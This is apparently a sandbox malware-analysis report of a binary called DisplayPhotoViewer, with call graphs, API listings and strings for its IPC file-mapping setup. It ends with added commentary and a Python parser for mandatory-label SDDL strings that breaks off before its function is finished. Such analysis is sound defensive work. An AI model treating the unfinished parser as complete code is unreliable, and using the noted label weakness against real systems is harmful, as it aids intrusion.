calls 51689->51921 51690->51648 51697 11130bc6 SetForegroundWindow 51690->51697 51913 11129200 ShowWindow 51691->51913 51693 11130eb5 51693->51680 51698 11130d4f GetLastError 51694->51698 51708 11130d5d 51694->51708 51697->51648 51698->51708 51703 11130f82 51700->51703 51704 11130eeb 51700->51704 51735 11130f76 51700->51735 51701 11130ba5 51914 11129200 ShowWindow 51701->51914 51702 11130380 131 API calls 51720 11130fcf 51702->51720 51703->51735 51925 1103de00 InterlockedDecrement 51703->51925 51714 111077a0 std::locale::facet::_Facet_Register 22 API calls 51704->51714 51704->51735 51706 11130c87 EnableWindow 51706->51657 51707 11130c71 51707->51706 51710 11130c80 SetForegroundWindow 51707->51710 51708->51665 51713 11130dae 51708->51713 51716 1107d140 IsDBCSLeadByte 51708->51716 51709 11130bac EnableWindow 51709->51690 51710->51706 51711 11130ff6 51711->51650 51718 111395a0 8 API calls 51713->51718 51717 11130f0c 51714->51717 51715 11130f91 51926 1103de80 InterlockedDecrement 51715->51926 51716->51713 51721 11130f41 51717->51721 
51722 11130f1e 51717->51722 51723 11130dc0 51718->51723 51720->51711 51844 111385d0 51720->51844 51923 1103ddc0 25 API calls 51721->51923 51922 110534a0 33 API calls 51722->51922 51723->51665 51727 11130dc7 GetLastError 51723->51727 51724 11130f9c 51927 1103dea0 InterlockedDecrement 51724->51927 51727->51665 51729 11130f30 51729->51721 51730 11130fa7 51928 1103de60 InterlockedDecrement 51730->51928 51733 11130f55 51924 1103de20 25 API calls 51733->51924 51735->51702 51737 1112bb32 51736->51737 51738 1112be54 51736->51738 51740 11059e50 6 API calls 51737->51740 51739 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51738->51739 51741 1112be6c 51739->51741 51742 1112bb52 51740->51742 51775 1112b5d0 51741->51775 51742->51738 51743 1112bb5a GetLocalTime 51742->51743 51744 1112bb70 51743->51744 51745 1112bb91 LoadLibraryA 51743->51745 51744->51745 51929 11009840 LoadLibraryA 51745->51929 51747 1112bbe5 51930 11015b30 LoadLibraryA 51747->51930 51749 1112bbf0 GetCurrentProcess 51750 1112bc15 GetProcAddress 51749->51750 51751 1112bc2d 51749->51751 51750->51751 51752 1112bc36 SetLastError 51750->51752 51753 1112bc62 51751->51753 51754 1112bc48 GetProcAddress 51751->51754 51752->51751 51756 1112bc70 GetProcAddress 51753->51756 51757 1112bc8a 51753->51757 51754->51753 51755 1112bc97 SetLastError 51754->51755 51755->51756 51756->51757 51758 1112bca4 SetLastError 51756->51758 51759 1112bcaf GetProcAddress 51757->51759 51758->51759 51760 1112bccf SetLastError 51759->51760 51763 1112bcc1 51759->51763 51760->51763 51761 1112be3a FreeLibrary 51762 1112be3d 51761->51762 51764 1112be47 FreeLibrary 51762->51764 51765 1112be4a 51762->51765 51767 11059e50 6 API calls 51763->51767 51774 1112be14 51763->51774 51764->51765 51765->51738 51766 1112be51 FreeLibrary 51765->51766 51766->51738 51768 1112bd9e 51767->51768 51769 11059e50 6 API calls 51768->51769 51770 1112bdc6 51769->51770 51771 11059e50 6 API calls 51770->51771 51772 1112bded 51771->51772 51773 11059e50 6 API calls 
51772->51773 51773->51774 51774->51761 51774->51762 51777 1112b5fd 51775->51777 51776 1112bab9 51776->51648 51776->51711 51849 11130640 51776->51849 51777->51776 51778 1112b697 51777->51778 51780 1112b6ae 51777->51780 51931 11027f50 6 API calls 51778->51931 51781 1112b6ab 51780->51781 51782 1112b6ec 51780->51782 51781->51780 51932 11027f50 6 API calls 51781->51932 51783 1107d280 15 API calls 51782->51783 51785 1112b6fa 51783->51785 51791 1112b711 51785->51791 51933 110093d0 6 API calls std::locale::facet::_Facet_Register 51785->51933 51788 1112b70b 51789 1107d140 IsDBCSLeadByte 51788->51789 51789->51791 51790 1112b85e 51796 1112b891 51790->51796 51797 1112b87a 51790->51797 51794 1112b78f 51791->51794 51934 1101b9b0 6 API calls std::locale::facet::_Facet_Register 51791->51934 51793 1112b82b 51793->51794 51935 11027f50 6 API calls 51793->51935 51794->51790 51794->51793 51799 1112b88e 51796->51799 51801 1112b8bc 51796->51801 51803 1112b904 51796->51803 51936 11027f50 6 API calls 51797->51936 51799->51796 51937 11027f50 6 API calls 51799->51937 51800 1112b950 _free 51807 1112b968 51800->51807 51804 1107d210 2 API calls 51801->51804 51803->51800 51811 1112b922 51803->51811 51812 1112b939 51803->51812 51816 1112b99c 51803->51816 51813 1112b8c7 51804->51813 51805 1112b9e6 51820 1112b9e3 51805->51820 51825 1112ba15 51805->51825 51835 1112ba71 51805->51835 51806 1112b9cf 51942 11027f50 6 API calls 51806->51942 51808 1112b983 __strdup 51807->51808 51809 1112b96c 51807->51809 51808->51816 51941 11027f50 6 API calls 51809->51941 51940 11027f50 6 API calls 51811->51940 51819 1107d280 15 API calls 51812->51819 51813->51803 51829 1112b8f5 51813->51829 51830 1112b8de 51813->51830 51816->51805 51816->51806 51818 110c9920 7 API calls 51823 1112baaa 51818->51823 51824 1112b949 51819->51824 51820->51805 51943 11027f50 6 API calls 51820->51943 51826 110c9920 7 API calls 51823->51826 51824->51800 51824->51816 51828 1107d280 15 API calls 51825->51828 51826->51776 51833 1112ba23 
51828->51833 51939 110c9960 6 API calls 2 library calls 51829->51939 51938 11027f50 6 API calls 51830->51938 51833->51835 51837 1112ba38 51833->51837 51838 1112ba4f 51833->51838 51835->51818 51944 11027f50 6 API calls 51837->51944 51839 1107d140 IsDBCSLeadByte 51838->51839 51841 1112ba5a 51839->51841 51841->51835 51945 110093d0 6 API calls std::locale::facet::_Facet_Register 51841->51945 51845 111385ef 51844->51845 51846 111385da 51844->51846 51845->51711 51946 11137c50 51846->51946 51848->51642 51850 11130a7f 51849->51850 51853 1113065d 51849->51853 51851 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51850->51851 51852 11130a8e 51851->51852 51852->51651 51853->51850 51854 1113b380 21 API calls 51853->51854 51855 1113069c 51854->51855 51855->51850 51856 11059e50 6 API calls 51855->51856 51857 111306cb 51856->51857 52017 11124a30 51857->52017 51859 11130810 PostMessageA 51860 11130825 51859->51860 51871 11130835 51860->51871 52024 111075f0 InterlockedDecrement 51860->52024 51861 11059e50 6 API calls 51862 1113080c 51861->51862 51862->51859 51862->51860 51864 11130893 51869 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51864->51869 51865 111308ae 51866 111391f0 104 API calls 51865->51866 51868 111308b3 51866->51868 51867 1113071b 51874 1113bd30 4 API calls 51867->51874 51875 111307bb 51867->51875 51870 1113ce00 13 API calls 51868->51870 51872 111308aa 51869->51872 51873 111308ba SetWindowTextA 51870->51873 51871->51864 51871->51865 51872->51651 51877 111308d6 51873->51877 51874->51875 51875->51859 51875->51861 51876 11130934 51878 11130a0c 51876->51878 51887 11130948 51876->51887 51877->51876 51880 1113091c 51877->51880 51879 11130a2d 51878->51879 51884 11130a14 51878->51884 52030 110f12c0 16 API calls 51879->52030 52025 11129200 ShowWindow 51880->52025 51881 1113096c 52027 110f12c0 16 API calls 51881->52027 52029 11129200 ShowWindow 51884->52029 51886 11130a38 51886->51850 51891 11130a3c IsWindowVisible 51886->51891 51887->51881 
51895 11130962 51887->51895 51888 11130977 51888->51850 51892 1113097f IsWindowVisible 51888->51892 51889 1113092c 51889->51876 51891->51850 51894 11130a4e IsWindowVisible 51891->51894 51892->51850 51896 11130996 51892->51896 51893 11130a2a 51893->51879 51894->51850 51897 11130a5b EnableWindow 51894->51897 52026 11129200 ShowWindow 51895->52026 51899 1113b380 21 API calls 51896->51899 52031 11129200 ShowWindow 51897->52031 51902 111309a1 51899->51902 51901 11130969 51901->51881 51902->51850 51904 111309ac GetForegroundWindow IsWindowVisible 51902->51904 51903 11130a72 EnableWindow 51903->51850 51905 111309d1 51904->51905 51906 111309c6 EnableWindow 51904->51906 52028 11129200 ShowWindow 51905->52028 51906->51905 51908 111309d8 51909 111309ee EnableWindow 51908->51909 51910 111309e7 SetForegroundWindow 51908->51910 51911 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51909->51911 51910->51909 51912 11130a08 51911->51912 51912->51651 51913->51701 51914->51709 51915->51684 51916->51707 51917->51682 51918->51670 51919->51693 51920->51700 51921->51700 51922->51729 51923->51733 51924->51735 51925->51715 51926->51724 51927->51730 51928->51735 51929->51747 51930->51749 51933->51788 51934->51794 51939->51803 51945->51835 51947 11137c8f 51946->51947 51974 11137c88 51946->51974 51948 111077a0 std::locale::facet::_Facet_Register 22 API calls 51947->51948 51950 11137c96 51948->51950 51949 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51951 111385c8 51949->51951 51952 11137cc6 51950->51952 51953 1105d0a0 22 API calls 51950->51953 51951->51845 51954 1105d820 25 API calls 51952->51954 51953->51952 51955 11137d02 51954->51955 51956 11137d09 RegCloseKey 51955->51956 51957 11137d10 51955->51957 51956->51957 51958 1113b0a0 122 API calls 51957->51958 51959 11137d2c 51958->51959 51960 111395a0 8 API calls 51959->51960 51961 11137d40 51960->51961 51962 11137d57 51961->51962 51963 1105ee80 169 API calls 51961->51963 51964 111077a0 
std::locale::facet::_Facet_Register 22 API calls 51962->51964 51963->51962 51966 11137d5e 51964->51966 51965 111077a0 std::locale::facet::_Facet_Register 22 API calls 51967 11137d93 51965->51967 51966->51965 51968 111077a0 std::locale::facet::_Facet_Register 22 API calls 51967->51968 51984 11137dc8 51968->51984 51969 11059e50 6 API calls 51988 11138181 51969->51988 51970 11138145 51970->51969 51970->51974 51971 1107d280 15 API calls 51971->51984 51973 11138343 EnterCriticalSection 51975 11138361 51973->51975 51974->51949 51976 1113838a LeaveCriticalSection 51975->51976 51980 11029350 26 API calls 51975->51980 51981 111383dd 51976->51981 51985 1113839d 51976->51985 51977 11138313 51977->51973 52012 11063910 61 API calls 51977->52012 51978 11129970 15 API calls 51978->51984 51982 11138387 51980->51982 51983 1112b5d0 25 API calls 51981->51983 51982->51976 51991 111383e7 51983->51991 51984->51970 51984->51971 51984->51978 51986 1107d330 15 API calls 51984->51986 51985->51981 51987 11133750 198 API calls 51985->51987 51986->51984 51989 111383b0 51987->51989 52011 11063910 61 API calls 51988->52011 51990 11137810 548 API calls 51989->51990 51992 111383b6 51990->51992 52013 110c90c0 6 API calls std::locale::facet::_Facet_Register 51991->52013 51992->51981 51993 110258f0 175 API calls 51992->51993 51993->51981 51995 110c9920 7 API calls 51997 11138519 51995->51997 51996 1113845b 51999 11138482 51996->51999 52000 11138499 51996->52000 52005 111384de 51996->52005 51998 110c9920 7 API calls 51997->51998 51998->51974 52014 11027f50 6 API calls 51999->52014 52002 1107d280 15 API calls 52000->52002 52004 111384aa 52002->52004 52004->52005 52015 110093d0 6 API calls std::locale::facet::_Facet_Register 52004->52015 52005->51995 52007 111384be 52008 1107d140 IsDBCSLeadByte 52007->52008 52009 111384c4 52008->52009 52009->52005 52016 110093d0 6 API calls std::locale::facet::_Facet_Register 52009->52016 52011->51977 52012->51977 52013->51996 52015->52007 52016->52005 52018 11124a4c 
52017->52018 52019 11124a87 52018->52019 52020 11124a74 52018->52020 52032 110678a0 61 API calls 52019->52032 52022 1113ce00 13 API calls 52020->52022 52023 11124a7f 52022->52023 52023->51867 52024->51871 52025->51889 52026->51901 52027->51888 52028->51908 52029->51893 52030->51886 52031->51903 52032->52023 52033 1115caa3 52036 1115ca24 52033->52036 52035 1115cab3 52037 1115ca4b 52036->52037 52040 1115ca31 52036->52040 52038 1115ca54 GetFileAttributesA 52037->52038 52037->52040 52039 1115ca62 GetLastError __dosmaperr 52038->52039 52041 1115ca47 52038->52041 52039->52041 52043 111636c4 11 API calls _strcpy_s 52040->52043 52041->52035 52043->52041 52044 11083b10 52049 11157580 52044->52049 52050 11083b34 InitializeCriticalSection 52049->52050 52051 11083980 52050->52051 52052 1113bd30 4 API calls 52051->52052 52054 110839b3 52052->52054 52053 11083ab8 52054->52053 52054->52054 52055 111077a0 std::locale::facet::_Facet_Register 22 API calls 52054->52055 52056 11083a09 52055->52056 52057 11083a4d 52056->52057 52058 11083a36 52056->52058 52064 11081e80 52057->52064 52093 11027f50 6 API calls 52058->52093 52062 1113bd30 4 API calls 52063 11083a58 52062->52063 52063->52053 52063->52062 52063->52063 52065 11081e9b 52064->52065 52066 11081e9f 52065->52066 52067 11081eb0 52065->52067 52068 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52066->52068 52069 1113aeb0 120 API calls 52067->52069 52070 11081eac 52068->52070 52071 11081eb7 52069->52071 52070->52063 52071->52071 52072 11081edb LoadLibraryA 52071->52072 52073 11081f79 GetProcAddress 52072->52073 52074 11081f14 52072->52074 52075 1108201c 52073->52075 52076 11081f94 GetProcAddress 52073->52076 52077 11081f1d GetModuleFileNameA 52074->52077 52078 11081f70 52074->52078 52081 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52075->52081 52076->52075 52080 11081fa5 GetProcAddress 52076->52080 52079 1107d210 2 API calls 52077->52079 52078->52073 52078->52075 52082 11081f3e LoadLibraryA 
52079->52082 52080->52075 52083 11081fb6 GetProcAddress 52080->52083 52084 1108202a 52081->52084 52082->52078 52083->52075 52085 11081fc7 GetProcAddress 52083->52085 52084->52063 52085->52075 52086 11081fd8 GetProcAddress 52085->52086 52086->52075 52087 11081fe9 GetProcAddress 52086->52087 52087->52075 52088 11081ffa GetProcAddress 52087->52088 52088->52075 52089 1108200b GetProcAddress 52088->52089 52089->52075 52090 1108202e 52089->52090 52091 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52090->52091 52092 11082040 52091->52092 52092->52063 52094 1115eecd 52095 1115eedd 52094->52095 52096 1115eed8 ___security_init_cookie 52094->52096 52099 1115edd7 52095->52099 52096->52095 52098 1115eeeb 52100 1115ede3 52099->52100 52101 1115ee80 52100->52101 52105 1115ee30 52100->52105 52107 1115ec73 52100->52107 52101->52098 52103 1115ee60 52103->52101 52104 1115ec73 __CRT_INIT@12 40 API calls 52103->52104 52104->52101 52105->52101 52105->52103 52106 1115ec73 __CRT_INIT@12 40 API calls 52105->52106 52106->52103 52108 1115ec7f 52107->52108 52109 1115ec87 52108->52109 52110 1115ed01 52108->52110 52135 11162c90 HeapCreate 52109->52135 52112 1115ed07 52110->52112 52113 1115ed62 52110->52113 52117 1115ec90 52112->52117 52121 1115ed2a __ioterm __mtterm 52112->52121 52114 1115ed67 ___set_flsgetvalue 52113->52114 52115 1115edc0 52113->52115 52118 1115f57e __calloc_crt 2 API calls 52114->52118 52115->52117 52154 111610be TlsGetValue TlsGetValue DecodePointer __freefls TlsSetValue 52115->52154 52116 1115ec8c 52116->52117 52136 1116112c GetModuleHandleW 52116->52136 52117->52105 52119 1115ed78 52118->52119 52119->52117 52123 1115ed84 DecodePointer 52119->52123 52121->52117 52128 1115ed99 52123->52128 52124 1115ec9c 52124->52117 52125 1115eca7 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA __ioinit 52124->52125 52126 1115ecd1 __setargv 52125->52126 52127 1115ecca __mtterm 52125->52127 52129 1115ecfa __ioterm 52126->52129 52130 1115ecda __setenvp 
52126->52130 52127->52117 52131 1115edb4 _free 52128->52131 52132 1115ed9d 52128->52132 52129->52127 52130->52129 52133 1115ece3 __cinit 52130->52133 52131->52117 52134 1115eda4 GetCurrentThreadId 52132->52134 52133->52117 52133->52129 52134->52117 52135->52116 52137 11161140 __mtterm 52136->52137 52138 11161149 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 52136->52138 52137->52124 52139 11161193 TlsAlloc 52138->52139 52141 111612a2 52139->52141 52142 111611e1 TlsSetValue 52139->52142 52141->52124 52142->52141 52143 111611f2 __init_pointers EncodePointer EncodePointer EncodePointer EncodePointer 52142->52143 52144 11161236 52143->52144 52145 1116129d __mtterm 52144->52145 52146 1116123a DecodePointer 52144->52146 52145->52141 52147 1116124f 52146->52147 52147->52145 52148 1115f57e __calloc_crt 2 API calls 52147->52148 52149 11161265 52148->52149 52149->52145 52150 1116126d DecodePointer 52149->52150 52151 1116127e 52150->52151 52151->52145 52152 11161282 52151->52152 52153 1116128a GetCurrentThreadId 52152->52153 52153->52141 52154->52117

Control-flow Graph

• Executed
• Not Executed
                                                                                                    control_flow_graph 671 11098e70-11098ed2 call 11098670 674 11098ed8-11098efb call 11098130 671->674 675 110994f0 671->675 681 11098f01-11098f15 LocalAlloc 674->681 682 11099064-11099066 674->682 677 110994f2-1109950d call 11157561 675->677 683 11098f1b-11098f4d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 681->683 684 110994e5-110994eb call 110981c0 681->684 685 11098ff6-1109901b CreateFileMappingA 682->685 688 11098fda-11098ff0 683->688 689 11098f53-11098f7e call 110980a0 call 110980e0 683->689 684->675 686 11099068-1109907b GetLastError 685->686 687 1109901d-1109903d GetLastError call 1100d7e0 685->687 693 1109907d 686->693 694 11099082-11099099 MapViewOfFile 686->694 700 11099048-11099050 687->700 701 1109903f-11099046 LocalFree 687->701 688->685 720 11098fc9-11098fd1 689->720 721 11098f80-11098fb6 GetSecurityDescriptorSacl 689->721 693->694 697 1109909b-110990b6 call 1100d7e0 694->697 698 110990d7-110990df 694->698 714 110990b8-110990b9 LocalFree 697->714 715 110990bb-110990c3 697->715 702 11099181-11099193 698->702 703 110990e5-110990fe GetModuleFileNameA 698->703 710 11099052-11099053 LocalFree 700->710 711 11099055-1109905f 700->711 701->700 706 110991d9-110991f2 call 11157580 GetTickCount 702->706 707 11099195-11099198 702->707 708 1109919d-110991b8 call 1100d7e0 703->708 709 11099104-1109910d 703->709 732 110991f4-110991f9 706->732 716 1109927f-110992e3 GetCurrentProcessId GetModuleFileNameA call 11098500 707->716 736 110991ba-110991bb LocalFree 708->736 737 110991bd-110991c5 708->737 709->708 717 11099113-11099116 709->717 710->711 719 110994de-110994e0 call 110985b0 711->719 714->715 724 110990c8-110990d2 715->724 725 110990c5-110990c6 LocalFree 715->725 741 110992eb-11099302 CreateEventA 716->741 742 110992e5 716->742 727 11099159-1109917c call 1100d7e0 call 110985b0 717->727 728 11099118-1109911c 717->728 719->684 720->688 722 
11098fd3-11098fd4 FreeLibrary 720->722 721->720 731 11098fb8-11098fc3 SetSecurityDescriptorSacl 721->731 722->688 724->719 725->724 727->702 728->727 735 1109911e-11099129 728->735 731->720 738 110991fb-1109920a 732->738 739 1109920c 732->739 743 11099130-11099134 735->743 736->737 744 110991ca-110991d4 737->744 745 110991c7-110991c8 LocalFree 737->745 738->732 738->739 746 1109920e-11099214 739->746 750 11099304-11099323 GetLastError * 2 call 1100d7e0 741->750 751 11099326-1109932e 741->751 742->741 748 11099150-11099152 743->748 749 11099136-11099138 743->749 744->719 745->744 755 11099225-1109927d 746->755 756 11099216-11099223 746->756 752 11099155-11099157 748->752 757 1109913a-11099140 749->757 758 1109914c-1109914e 749->758 750->751 753 11099330 751->753 754 11099336-11099347 CreateEventA 751->754 752->708 752->727 753->754 761 11099349-11099368 GetLastError * 2 call 1100d7e0 754->761 762 1109936b-11099373 754->762 755->716 756->746 756->755 757->748 763 11099142-1109914a 757->763 758->752 761->762 765 1109937b-1109938d CreateEventA 762->765 766 11099375 762->766 763->743 763->758 768 1109938f-110993ae GetLastError * 2 call 1100d7e0 765->768 769 110993b1-110993b9 765->769 766->765 768->769 771 110993bb 769->771 772 110993c1-110993d2 CreateEventA 769->772 771->772 773 110993f4-11099402 772->773 774 110993d4-110993f1 GetLastError * 2 call 1100d7e0 772->774 777 11099404-11099405 LocalFree 773->777 778 11099407-1109940f 773->778 774->773 777->778 780 11099411-11099412 LocalFree 778->780 781 11099414-1109941d 778->781 780->781 782 11099423-11099426 781->782 783 110994c7-110994d9 call 1100d7e0 781->783 782->783 785 1109942c-1109942f 782->785 783->719 785->783 787 11099435-11099438 785->787 787->783 788 1109943e-11099441 787->788 789 1109944c-11099468 CreateThread 788->789 790 11099443-11099449 GetCurrentThreadId 788->790 791 1109946a-11099474 789->791 792 11099476-11099480 789->792 790->789 791->719 793 1109949a-110994c5 SetEvent call 1100d7e0 call 110981c0 
792->793 794 11099482-11099498 ResetEvent * 3 792->794 793->677 794->793
                                                                                                    APIs
                                                                                                      • Part of subcall function 11098130: GetCurrentProcess.KERNEL32(000F01FF,?,1102E7AA,00000000,00000000,00080000,218EC38C,00080000,00000000,00000000), ref: 1109815D
                                                                                                      • Part of subcall function 11098130: OpenProcessToken.ADVAPI32(00000000), ref: 11098164
                                                                                                      • Part of subcall function 11098130: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 11098175
                                                                                                      • Part of subcall function 11098130: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 11098199
                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,218EC38C,00080000,00000000,00000000), ref: 11098F05
                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 11098F1E
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 11098F29
                                                                                                    • GetVersionExA.KERNEL32(?), ref: 11098F40
                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 11098FAE
                                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 11098FC3
                                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 11098FD4
                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,1102E7AA,00000004,00000000,?,?), ref: 11099010
                                                                                                    • GetLastError.KERNEL32 ref: 1109901D
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099046
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099053
                                                                                                    • GetLastError.KERNEL32 ref: 11099070
                                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109908E
                                                                                                    • LocalFree.KERNEL32(?), ref: 110990B9
                                                                                                    • LocalFree.KERNEL32(?), ref: 110990C6
                                                                                                      • Part of subcall function 110980A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,11098F5E), ref: 110980A8
                                                                                                      • Part of subcall function 110980E0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 110980F4
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110990F2
                                                                                                    • LocalFree.KERNEL32(?), ref: 110991BB
                                                                                                    • LocalFree.KERNEL32(?), ref: 110991C8
                                                                                                    • _memset.LIBCMT ref: 110991E0
                                                                                                    • GetTickCount.KERNEL32 ref: 110991E8
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 11099294
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110992AF
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 110992FB
                                                                                                    • GetLastError.KERNEL32 ref: 11099304
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109930B
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 11099340
                                                                                                    • GetLastError.KERNEL32 ref: 11099349
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 11099350
                                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 11099386
                                                                                                    • GetLastError.KERNEL32 ref: 1109938F
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 11099396
                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 110993CB
                                                                                                    • GetLastError.KERNEL32 ref: 110993DA
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 110993DD
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099405
                                                                                                    • LocalFree.KERNEL32(?), ref: 11099412
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11099443
                                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_00098A10,00000000,00000000,00000030), ref: 1109945D
                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109948C
                                                                                                    • ResetEvent.KERNEL32(?), ref: 11099492
                                                                                                    • ResetEvent.KERNEL32(?), ref: 11099498
                                                                                                    • SetEvent.KERNEL32(?), ref: 1109949E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                    • API String ID: 3291243470-2792520954
                                                                                                    • Opcode ID: b29928ef36f4a526e7e0e8bfda600b7ab5ebfe87b8ec127c718a02ca3981d435
                                                                                                    • Instruction ID: c7e67fb3088867accc3e8c580180b1e24b3d2937ed75d1edbd7858024c42e2b0
                                                                                                    • Opcode Fuzzy Hash: b29928ef36f4a526e7e0e8bfda600b7ab5ebfe87b8ec127c718a02ca3981d435
                                                                                                    • Instruction Fuzzy Hash: 1B1282B5D0021E9FDB21DF65DCD4EAEB7B9FB88304F0085A9E51D97240E771AA848F60
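The String ID list above carries the SDDL fragment S:(ML;;NW;;;LW) next to SeSecurityPrivilege and the "cant create filemap" / "cant create events" messages, and the API ID tokens show a security descriptor SACL being set and a token privilege adjusted, so the IPC file mapping and events this function creates are labelled with a Low mandatory label and the no-write-up policy. The practical point for a reviewer: that label only bars Untrusted-integrity callers from writing to the objects; a Low-integrity process (a sandboxed browser renderer, for instance) can still open and write them, subject to the DACL. The parser below is an added example for this report, not code from the sample or from Joe Sandbox; the token tables are the documented SDDL abbreviations for mandatory-label ACEs, the first input string is taken from the report's String ID list, and the second is constructed for illustration.

```python
"""Decode the SACL part of an SDDL string and report which integrity level
can still write to the labelled object.

Added example for this report, not the sample's code.  The first SAMPLE
string is the one the report lists; the second is constructed."""
import re
from dataclasses import dataclass

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
             "AU": "SYSTEM_AUDIT", "ML": "SYSTEM_MANDATORY_LABEL"}
# Mandatory-label policy bits (SYSTEM_MANDATORY_LABEL_* in winnt.h)
LABEL_POLICY = {"NW": "NO_WRITE_UP", "NR": "NO_READ_UP", "NX": "NO_EXECUTE_UP"}
# Integrity-level SIDs in SDDL shorthand (the RID is the level value)
LABEL_SIDS = {"LW": ("S-1-16-4096", "Low"), "ME": ("S-1-16-8192", "Medium"),
              "MP": ("S-1-16-8448", "Medium Plus"), "HI": ("S-1-16-12288", "High"),
              "SI": ("S-1-16-16384", "System")}


@dataclass
class Ace:
    ace_type: str
    flags: list
    rights: list
    sid: str


def _split_pairs(s):
    """'NWNR' -> ['NW', 'NR']; a hex mask such as '0x1' is kept whole."""
    if not s:
        return []
    if s.lower().startswith("0x"):
        return [s]
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def parse_sacl(sddl):
    """Return the ACEs of the S: section of an SDDL string (empty if none)."""
    m = re.search(r"S:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(2)):
        fields = body.split(";")          # type;flags;rights;object;inherit;sid
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, flags, rights, _obj, _inh, sid = fields
        aces.append(Ace(ACE_TYPES.get(ace_type, ace_type),
                        _split_pairs(flags), _split_pairs(rights), sid))
    return aces


def mandatory_label(sddl):
    """(level name, SID, [policy names]) from the first ML ACE, or None."""
    for ace in parse_sacl(sddl):
        if ace.ace_type == "SYSTEM_MANDATORY_LABEL":
            sid, level = LABEL_SIDS.get(ace.sid, (ace.sid, ace.sid))
            return level, sid, [LABEL_POLICY.get(r, r) for r in ace.rights]
    return None


def lowest_writer(sddl):
    """Lowest integrity level the label still lets write, or None when the
    label imposes no write restriction.  NO_WRITE_UP blocks only callers
    *below* the label, so the label's own level is the lowest writer."""
    lab = mandatory_label(sddl)
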